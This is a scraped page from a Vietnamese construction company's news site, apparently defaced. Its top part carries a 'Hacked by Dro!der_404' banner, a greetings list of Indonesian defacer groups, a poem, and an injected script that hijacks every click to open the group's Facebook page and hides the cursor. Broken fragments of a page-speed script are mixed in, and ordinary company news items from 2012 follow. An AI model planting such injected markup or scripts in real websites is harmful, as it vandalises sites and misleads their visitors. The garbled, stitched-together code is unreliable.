Tin mới
Hacked by Dro!der_404
Hacked By Dro!der_404 body{text-align:center;font-size:12px;font-family:verdana;background-color:#000;background:url(http://backdoorapp.com/wp-content/uploads/2017/11/naruto-kurama-mode-wallpapers-59-wallpapers-hd-wallpapers-untuk-gambar-keren-naruto-mode-bijuu.png)}

Hacked By Dro!der_404

//b||1342177279>>=1)c+=c;return a};q!=p&&null!=q&&g(h,n,{configurable:!0,writable:!0,value:q});var t=this;function u(b,c){var a=b.split("."),d=t;a[0]in d||!d.execScript||d.execScript("var "+a[0]);for(var e;a.length&&(e=a.shift());)a.length||void 0===c?d[e]?d=d[e]:d=d[e]={}:d[e]=c};function v(b){var c=b.length;if(0=c.offsetWidth&&0>=c.offsetHeight)a=!1;else{d=c.getBoundingClientRect();var f=document.body;a=d.top+("pageYOffset"in window?window.pageYOffset:(document.documentElement||f.parentNode||f).scrollTop);d=d.left+("pageXOffset"in window?window.pageXOffset:(document.documentElement||f.parentNode||f).scrollLeft);f=a.toString()+","+d;b.b.hasOwnProperty(f)?a=!1:(b.b[f]=!0,a=a<=b.g.height&&d<=b.g.width)}a&&(b.a.push(e),b.c[e]=!0)}y.prototype.checkImageForCriticality=function(b){b.getBoundingClientRect&&z(this,b)};u("pagespeed.CriticalImages.checkImageForCriticality",function(b){x.checkImageForCriticality(b)});u("pagespeed.CriticalImages.checkCriticalImages",function(){A(x)});function A(b){b.b={};for(var c=["IMG","INPUT"],a=[],d=0;d=a.length+e.length&&(a+=e)}b.i&&(e="&rd="+encodeURIComponent(JSON.stringify(B())),131072>=a.length+e.length&&(a+=e),c=!0);C=a;if(c){d=b.h;b=b.j;var f;if(window.XMLHttpRequest)f=new XMLHttpRequest;else if(window.ActiveXObject)try{f=new ActiveXObject("Msxml2.XMLHTTP")}catch(r){try{f=new ActiveXObject("Microsoft.XMLHTTP")}catch(D){}}f&&(f.open("POST",d+(-1==d.indexOf("?")?"?":"&")+"url="+encodeURIComponent(b)),f.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),f.send(a))}}}function B(){var b={},c;c=document.getElementsByTagName("IMG");if(!c.length)return{};var a=c[0];if(!("naturalWidth"in a&&"naturalHeight"in a))return{};for(var d=0;a=c[d];++d){var e=a.getAttribute("data-pagespeed-url-hash");e&&(!(e in b)&&0=b[e].o&&a.height>=b[e].m)&&(b[e]={rw:a.width,rh:a.height,ow:a.naturalWidth,oh:a.naturalHeight})}return b}var C="";u("pagespeed.CriticalImages.getBeaconData",function(){return C});u("pagespeed.CriticalImages.Run",function(b,c,a,d,e,f){var r=new y(b,c,a,e,f);x=r;d&&w(function(){window.setTimeout(function(){A(r)},0)})});})();pagespeed.CriticalImages.Run('/mod_pagespeed_beacon','http://hunganhdepot.com/index.php/catalog/seo_sitemap/category','EhdC8BgON2',true,false,'ka-uVBegFxQ'); //]]> <

[ AndroSec1337 Cyber Team ]

Ada saatnya aku LELAH dan SADAR
Kalau aku sudah tidak di butuhkan lagi oleh mu
Thanks buat semua harapan yg telah kamu berikan
Walaupun itu hanyalah fake


Greetz:

./Xi4u7 || Deadrz_404 || Mr.DrackNight || Anb3rSecID || Mr_/bon'007 || DeathCreppy || Anoncyber403 || Mr.b0t4k || N07_4L0N3 || ID_OUT96 || ~xGans || Elang X-Coder ID || C4bnL || Mr.falcon'/404 || MR.DRMN404 || X-Mr.R4h1M || B@dass || /Ms_L4zDy || AndroGhost || J_Lynx69 || V-Z3R0 || Silen7 || ASynCroRa
AndroSec1337 Cyber Team || Jones Unlimited Edition || Garooda Security Squad || All Team Defacer Indonesia

window.onclick=function(){window.open('https://m.facebook.com/androsec1337cyberteam/')} BODY{cursor:none}

Droider404@gmail.com

Lễ Kỷ niệm 30 năm ngày Nhà giáo Việt Nam
Trong không khí hân hoan của cả nước hướng về ngày nhà giáo Việt Nam 20/11- ngày mà cả xã hội với tấm lòng trân trọng, tôn vinh công lao cao cả đối với nhà giáo, chúng ta ai ai cũng hướng về các thầy cô kính mến của mình với lòng biết ơn sâu đậm và niềm tôn kính vô hạn
Giải Bóng đá Thanh niên CECICO579 năm 2012
anh1_7_9_2012
Nhân dịp Chào mừng Cách Mạng Tháng Tám, Quốc khánh 2/9 và kỷ niệm 12 năm ngày thành lập Công ty (01/9/2000 – 01/9/2012), được sự đồng ý của Cấp ủy, Hội đồng quản trị và Ban Tổng Giám đốc Công ty, BCH Đoàn Thanh niên tổ chức giải bóng đá Mini tranh cúp CECICO579 năm 2012. Giải đấu diễn ra từ ngày 28-30/8/2012.
THÔNG BÁO TỔ CHỨC ĐẠI HỘI ĐỒNG CỔ ĐÔNG THƯỜNG NIÊN NĂM 2012

Hội đồng quản trị Công ty Cổ phần Đầu tư và Xây dựng 579 trân trọng thông báo đến Quý cổ đông về việc tổ chức Đại hội đồng cổ đông thường niên năm 2012 của Công ty như sau: 

Giá đất Dự án PMA Giá thép Vitasteel Dành cho Quảng cáo